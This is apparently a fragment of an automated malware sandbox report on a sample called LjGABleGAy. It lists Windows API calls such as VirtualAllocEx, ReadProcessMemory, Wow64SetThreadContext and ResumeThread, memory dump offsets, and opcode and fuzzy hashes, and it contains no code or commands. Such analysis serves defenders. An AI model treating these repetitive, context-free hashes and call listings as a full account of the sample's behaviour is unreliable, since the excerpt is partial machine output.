                      • Instruction Fuzzy Hash: 802124B5D003099FCB10DFAAC885BEEBBF5FF48310F10842AE919A7240D7789944CBA0
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0305363E
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 6157f3ae2ac3ca46b3f9003b28338db3b0f6601c05182081074936fe230d8872
                      • Instruction ID: 261c7a68aa3cbdcff6f9bba2ae62bae40d9b7b873c61b3a01827a4882958e274
                      • Opcode Fuzzy Hash: 6157f3ae2ac3ca46b3f9003b28338db3b0f6601c05182081074936fe230d8872
                      • Instruction Fuzzy Hash: 522137B5D002098FDB50DFAAC4857EEFBF4EF48324F14842AD959A7240DB78A945CBA0
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 030538C8
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 4094222d0b19edcabbeea1e61581dfec3621e3f3dd94db03e6ceabcc683ff201
                      • Instruction ID: 8f6b3c9d6732bfb88198a45136908f47f0c5099ca95b191523bfb77d47f7b697
                      • Opcode Fuzzy Hash: 4094222d0b19edcabbeea1e61581dfec3621e3f3dd94db03e6ceabcc683ff201
                      • Instruction Fuzzy Hash: 982119B5D012499FCB10DFA9C8417EEFBF5FF48310F10842AE919A7240C7399545DBA0
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013BD5CF
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: 3967f81de676e912667d8f892e9042813bba4a4d91e869c3f6b6032a8cb81364
                      • Instruction ID: 2ea9b90387da591e63c4857b8a64b3770d04610d7bfb220ff81f873a453ead0b
                      • Opcode Fuzzy Hash: 3967f81de676e912667d8f892e9042813bba4a4d91e869c3f6b6032a8cb81364
                      • Instruction Fuzzy Hash: 7321F3B58002489FDB10CFAAD584ADEBFF5EB48314F14845AE918A7210D378A945CFA0
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 030538C8
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: f9331b9b88622e794880a515e86431ab182b17ec8f18ed66a0d20d057327a8fe
                      • Instruction ID: a8619a30a7464d0cd68c098092a7dc70bd12cf5b165e2d176b766fd3602b1521
                      • Opcode Fuzzy Hash: f9331b9b88622e794880a515e86431ab182b17ec8f18ed66a0d20d057327a8fe
                      • Instruction Fuzzy Hash: F32116B5C003499FCB10DFAAC841AEEFBF5FF48310F108429E919A7240D7389944CBA0
                      APIs
                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0305363E
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: ContextThreadWow64
                      • String ID:
                      • API String ID: 983334009-0
                      • Opcode ID: 40450df869f0c585909a452dfc53fa48e0e3b0ea680cb3434882c6802a2a8a42
                      • Instruction ID: ade3d0be8f1fe00bb2e47b019099c8f29174acf8de85a4ed3b9cc86bd039542e
                      • Opcode Fuzzy Hash: 40450df869f0c585909a452dfc53fa48e0e3b0ea680cb3434882c6802a2a8a42
                      • Instruction Fuzzy Hash: 9A2118B5D002098FDB50DFAAC4857EEFBF4EF48314F14842AD919A7240DB789945CFA5
                      APIs
                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013BD5CF
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: DuplicateHandle
                      • String ID:
                      • API String ID: 3793708945-0
                      • Opcode ID: 668b44ff01b16d09bab55ca78498384835096e1dcbaf78e5e98278ae22c50292
                      • Instruction ID: b8230314b7a2d7c94f0890bf199b283138fc0993c919162a008506ed2da37faf
                      • Opcode Fuzzy Hash: 668b44ff01b16d09bab55ca78498384835096e1dcbaf78e5e98278ae22c50292
                      • Instruction Fuzzy Hash: E721C4B59002489FDB10CF9AD584ADEBFF9FB48314F14841AE918A3350D379A944CFA5
                      APIs
                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013BB341,00000800,00000000,00000000), ref: 013BB552
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: c67892a0c71a7093213c963bca297b0d2197f35eaccf8fd9d5bf6b0728e2d9e8
                      • Instruction ID: 20cb726aff7377e7b5b73e03df709d2242ccd7804a3e3a316aafbc25fcd77520
                      • Opcode Fuzzy Hash: c67892a0c71a7093213c963bca297b0d2197f35eaccf8fd9d5bf6b0728e2d9e8
                      • Instruction Fuzzy Hash: 0F1114B68003489FDB10DF9AC484BDEFBF4EB48314F10842AD919A7600D779A545CFA5
                      APIs
                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013BB341,00000800,00000000,00000000), ref: 013BB552
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: 55c77c12cdc059d9d3f29a337d0dee545a9c1170fff30d3a92495637581dbaef
                      • Instruction ID: ff3d08a4d3235164787f61a927db94da5bcbf042e80a00c282e691d81426f09a
                      • Opcode Fuzzy Hash: 55c77c12cdc059d9d3f29a337d0dee545a9c1170fff30d3a92495637581dbaef
                      • Instruction Fuzzy Hash: 311126B6C003499FDB10CF9AD484BDEFBF4EB88310F10841AD919A7600D779A545CFA1
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 03053706
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: e7316c1df56a6275ff62f6dd7a02d7169766b2a507631c479e8788c7450ee358
                      • Instruction ID: bee84611e9b7c8c55c6ecae91fae71c092bfe691fa6837c6a18a16e8025b8423
                      • Opcode Fuzzy Hash: e7316c1df56a6275ff62f6dd7a02d7169766b2a507631c479e8788c7450ee358
                      • Instruction Fuzzy Hash: 4911F6B59002499FCB20DFAAC845BEFBFF5EF48320F148419E919A7250C779A544CFA1
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 013BB2C6
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: d997a49291fd729e0071e17f2aceb977cfdeb0b12150cadac77db866342181f4
                      • Instruction ID: 6c21a1290a6b22289da3d06547155cdca078ef18091c7faf119d9a578b8063dd
                      • Opcode Fuzzy Hash: d997a49291fd729e0071e17f2aceb977cfdeb0b12150cadac77db866342181f4
                      • Instruction Fuzzy Hash: 4211FDB6C002498FDB10DF9AD444ADEFBF8AB88224F10841AD928AB610D379A545CFA1
                      APIs
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 18b61e94d69d8e637e81a1d182d46e277c58642954b765245db8f72f46ce263a
                      • Instruction ID: 2eddd08bbce321577f35cf631dd841c3eeeb78c24a1034e9ecb261727d76dd3b
                      • Opcode Fuzzy Hash: 18b61e94d69d8e637e81a1d182d46e277c58642954b765245db8f72f46ce263a
                      • Instruction Fuzzy Hash: 62116AB5D002088FCB10DFA9C4457EEFBF4EF48310F248459D819A7240D738A940CFA0
                      APIs
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: ResumeThread
                      • String ID:
                      • API String ID: 947044025-0
                      • Opcode ID: 287e9946917151b59d2111d7bb47ea97ed84e9f44be0033da3063b23daa2658f
                      • Instruction ID: cd504175e8c6c46548c6ed7193b45bf0eb93a9637dd62b6dd316ec0aff55b619
                      • Opcode Fuzzy Hash: 287e9946917151b59d2111d7bb47ea97ed84e9f44be0033da3063b23daa2658f
                      • Instruction Fuzzy Hash: 841125B5D002488FCB20DFAAC4457AEFBF5EF88324F248419D519A7240CB79A944CBA0
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 013BB2C6
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215625375.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_13b0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: b8c2195b731a6d729d0a24295faa46f847bdaedc214edd3000d6577d6fe13530
                      • Instruction ID: 46cbc14539957acce79d235c5bd7b37cc1042d2e04121deae63f27fd736c9251
                      • Opcode Fuzzy Hash: b8c2195b731a6d729d0a24295faa46f847bdaedc214edd3000d6577d6fe13530
                      • Instruction Fuzzy Hash: 4211DFB5C002498FDB10DF9AD444ADEFBF4AF89324F10851AD929AB610D379A545CFA1
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0305788D
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: e3393d17d4d361e182a14706feb4151e74289ebfe927a609c08628a73707f306
                      • Instruction ID: 3c72bb566479168dfe29f52c5c566654f88e9b86aba172f4b13903f75939c5d0
                      • Opcode Fuzzy Hash: e3393d17d4d361e182a14706feb4151e74289ebfe927a609c08628a73707f306
                      • Instruction Fuzzy Hash: A811F5B58003489FCB10DF99C845BEEBBF8EB48720F108419E918A7200D375A944CFA5
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0305788D
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: 359f5b4b748c68b398d8842dc6c4a5ceaef615fe9069a40a3705830fa115ae69
                      • Instruction ID: e0c90db9e3767b48fa8dfd77729b434ec13c3d3a2c464ff83678db6ff8578bf4
                      • Opcode Fuzzy Hash: 359f5b4b748c68b398d8842dc6c4a5ceaef615fe9069a40a3705830fa115ae69
                      • Instruction Fuzzy Hash: 5A1103B58012489FDB10DF99D485BEEBBF4FB48320F20841AE918A7700C379A944CFA1
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215256335.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_12ed000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 921d8c7d6bb50e09d79be69dc0162a9edb74f108cc12677cfb5d3713d6e03f49
                      • Instruction ID: 92bc15ece1221062782a0307829cc4dfd79bd14ef4e18a33dad13caef1ed890b
                      • Opcode Fuzzy Hash: 921d8c7d6bb50e09d79be69dc0162a9edb74f108cc12677cfb5d3713d6e03f49
                      • Instruction Fuzzy Hash: BE212571510248DFDB16DF58E9C8F26BFA5FB88318F60C569E9090B256C33AD416CBA2
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215343186.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_12fd000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8466081804eefd0d1c2f62a0a2624c50e0a9d5985b22cc1898a9d002f75075f4
                      • Instruction ID: 040dfa431e2e0366f5b627e0d92f52ced5a1ef118b4bcc851ed9fb8b0c4470dc
                      • Opcode Fuzzy Hash: 8466081804eefd0d1c2f62a0a2624c50e0a9d5985b22cc1898a9d002f75075f4
                      • Instruction Fuzzy Hash: FF210071614208DFDB15DF68D980B26FF65EB88314F20C57DEA0A4B256C37AD406CA62
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215343186.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_12fd000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 85c63fa558c6d37f9269fcd15db45d449b20224afacb4452140d147744abf20e
                      • Instruction ID: 6ebb577336a6c3be50934d6ba9955867eec15752c34d30aebd5f81d50b118223
                      • Opcode Fuzzy Hash: 85c63fa558c6d37f9269fcd15db45d449b20224afacb4452140d147744abf20e
                      • Instruction Fuzzy Hash: 4521D3795542089FDB05DFA8D580F26FB65FB84324F20C57DDA094B257C37AD406CAA1
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215343186.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_12fd000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ce04c23e8672d40545515d216d60e3282410386dd2f454013869e1a05bdb1d0f
                      • Instruction ID: ce825f8d9c534849fdb9ac9605cb3b9934374f04a20d76aab5c69c1d71599319
                      • Opcode Fuzzy Hash: ce04c23e8672d40545515d216d60e3282410386dd2f454013869e1a05bdb1d0f
                      • Instruction Fuzzy Hash: 80217C755093848FDB03CF24D994715BF71EB46314F28C5EEDA498B2A7C33A980ACB62
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215256335.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_12ed000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                      • Instruction ID: 7272ce65d5ab4c8c841cc95b3e995cf7fe3fa32c03b49169af7d60888b25ef01
                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                      • Instruction Fuzzy Hash: 25110376404284CFCB12CF54D9C4B16BFB1FB88314F24C6A9D9490B257C336D45ACBA2
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215343186.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_12fd000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                      • Instruction ID: f2a1c9ef9683b2c4e87e070eb80aeedeb7c06218ed307e7c907116c72cccbea4
                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                      • Instruction Fuzzy Hash: 1D11BB79504284DFDB02CF54C5C4B15FFA1FB84224F24C6AEDA494B297C33AD40ACBA2

                      Execution Graph

                      Execution Coverage:12.9%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:40
                      Total number of Limit Nodes:3
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID: j
                      • API String ID: 0-2137352139
                      • Opcode ID: ad78aa6bd9c39f0731ebeae8dd2301462bfe39a1c23ad2d5ed104bda437c4a47
                      • Instruction ID: 653bc8decee7a13474311660f7d47f17e381472177972581da130ad5c01fa27b
                      • Opcode Fuzzy Hash: ad78aa6bd9c39f0731ebeae8dd2301462bfe39a1c23ad2d5ed104bda437c4a47
                      • Instruction Fuzzy Hash: F912CD307506158FCB15EF68D494A6EBBB6FF85304F01494DD9029B3A6CBB6ED09CB82
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID: j
                      • API String ID: 0-2137352139
                      • Opcode ID: a3db37d8979649e2a58a411cf6c5625f82f89ff8d48a1ab8cb647702cf6fd93c
                      • Instruction ID: 436eee667c0d75ab1b31f4d973596a266d8d077acddb17ed628be1802871c0e1
                      • Opcode Fuzzy Hash: a3db37d8979649e2a58a411cf6c5625f82f89ff8d48a1ab8cb647702cf6fd93c
                      • Instruction Fuzzy Hash: 6602DE30710215CFCB15EF68C494A6E7BB6FF85304F008949D5029B3A6CBB6ED09CB92
                      APIs
                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,065A74A6), ref: 065A7656
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348645088.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65a0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: e96c507a2dfc47a96df888044a34ff87685f2e29ac649d8af37dc8a67f6647f5
                      • Instruction ID: da5c6865220f65b6f6ca94f4752fd965a7b23234b645ded40179c2ec87d36787
                      • Opcode Fuzzy Hash: e96c507a2dfc47a96df888044a34ff87685f2e29ac649d8af37dc8a67f6647f5
                      • Instruction Fuzzy Hash: E11103B9D003498FDB20DF9AC844ADEFBF4AF88210F14842AD529A7710C379A546CFA4
                      APIs
                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,065A74A6), ref: 065A7656
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348645088.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65a0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: d5bb9837fbeea01b17c3d60a1d893d92988811643072ebf9a28c0cbafe078f8a
                      • Instruction ID: 7ee4b9fad740c4b59f4a76d63354b9b8f054dbe891abe125120cb4b93220428e
                      • Opcode Fuzzy Hash: d5bb9837fbeea01b17c3d60a1d893d92988811643072ebf9a28c0cbafe078f8a
                      • Instruction Fuzzy Hash: 121112B5D007498FDB20DF9AC444B9EFBF4EB88210F14842AD419B7310D379A545CFA5
                      APIs
                      • GetConsoleWindow.KERNELBASE ref: 012D0D47
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2328614618.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12d0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: ConsoleWindow
                      • String ID:
                      • API String ID: 2863861424-0
                      • Opcode ID: ab018f4e6712cf85bef2bdeb2425491ec9e2173eb53ee1c3c91e00b82f14fc4e
                      • Instruction ID: 9ebf6a123d93de3c4f3657bc8d6ee450df021dc6df258e00905234fa9b3f210b
                      • Opcode Fuzzy Hash: ab018f4e6712cf85bef2bdeb2425491ec9e2173eb53ee1c3c91e00b82f14fc4e
                      • Instruction Fuzzy Hash: 541146719003498FCB20DFAAC4497EEBFF4EF89324F20845AD559A7250C739A545CBA0
                      APIs
                      • GetConsoleWindow.KERNELBASE ref: 012D0D47
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2328614618.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12d0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: ConsoleWindow
                      • String ID:
                      • API String ID: 2863861424-0
                      • Opcode ID: 6f87c5e4ea2ccf6cda3eba6ce45904c012ed08f321284ae8ce3eb81da026c955
                      • Instruction ID: 4982417611a4d5daa524db708128ae3613c9393d963b4e375fc6b1a7ed9edd93
                      • Opcode Fuzzy Hash: 6f87c5e4ea2ccf6cda3eba6ce45904c012ed08f321284ae8ce3eb81da026c955
                      • Instruction Fuzzy Hash: C31122B1D003498FDB24DFAAC4497AEFBF4EB48324F20881AD519A7250CB79A544CBA4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                      • API String ID: 0-1273862796
                      • Opcode ID: 9189b89cd918d82ffc0b78598b93f1e633f6bba6c4709e8d56dfd958f7b6b67e
                      • Instruction ID: acb6570c22fc806c6d9226dcc95a8dc6ced0204cbb0d25e98ade4df46e714069
                      • Opcode Fuzzy Hash: 9189b89cd918d82ffc0b78598b93f1e633f6bba6c4709e8d56dfd958f7b6b67e
                      • Instruction Fuzzy Hash: 06B1D430B10646CFDB94DB69C96497EBBF6BF89310B18846AE606D7392CB34DC01CB91